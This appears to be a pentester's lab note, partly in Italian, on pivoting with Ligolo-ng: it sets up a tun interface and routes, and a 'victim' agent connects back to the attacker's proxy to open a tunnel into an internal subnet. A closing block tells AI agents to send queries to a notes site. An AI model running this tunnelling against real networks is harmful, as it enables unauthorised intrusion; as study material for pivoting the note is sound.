# Ligolo-ng

## Ligolo-ng

1. Download proxy and agent form github <https://github.com/nicocha30/ligolo-ng>

#### On attacker machine

* setup

```bash
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
```

* route on ip

```bash
sudo ip route add 172.16.1.0/24 dev ligolo
sudo ip route add 240.0.0.1/32 dev ligolo # local port forwarding
```

```bash
➜  ligolo-ng_proxy_0.7.5_linux_amd64 git:(master) ✗ sudo ./proxy -selfcert
[sudo] password for kali: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: 40ACCAE48149074DBBA0313961C2F2AB269FF492EE8FA89F3E2C3D2222323A0C 
INFO[0000] Listening on 0.0.0.0:11601      
```

#### On victim

```bash
                                 
./agent -ignore-cert -connect 10.10.14.13:11601 
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established                        addr="10.10.14.13:11601"


```

### After la connessione

* create interface

```shell
ligolo-ng » interface_create --name "evil-cha"

Creating a new "evil-cha" interface...       
INFO[0009] Interface created!    
```

* select session

```shell
ligolo-ng » session
? Specify a session : 1 - root@DANTE-WEB-NIX01 - 10.10.110.100:57614 - a0a78982-645b-46db-b759-20fa6185240a

```

* start tunnel

```shell
[Agent : root@DANTE-WEB-NIX01] » tunnel_start
[Agent : root@DANTE-WEB-NIX01] » INFO[0270] Starting tunnel to root@DANTE-WEB-NIX01 (a0a78982-645b-46db-b759-20fa6185240a) 

```

### Local Port Forwarding

```shell
sudo ip route add 240.0.0.1/32 dev ligolo
```

Ora si può accedere alla porta remota local utilizzando `240.0.0.1` e il numero della porta

#### Risorse

* <https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740>
* <https://docs.ligolo.ng/Quickstart/>
* <https://www.youtube.com/watch?si=tua3i2c3Y0hgN5XP\\&v=DM1B8S80EvQ\\&feature=youtu.be>
* <https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.dado1513.dev/tools/ligolo-ng.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.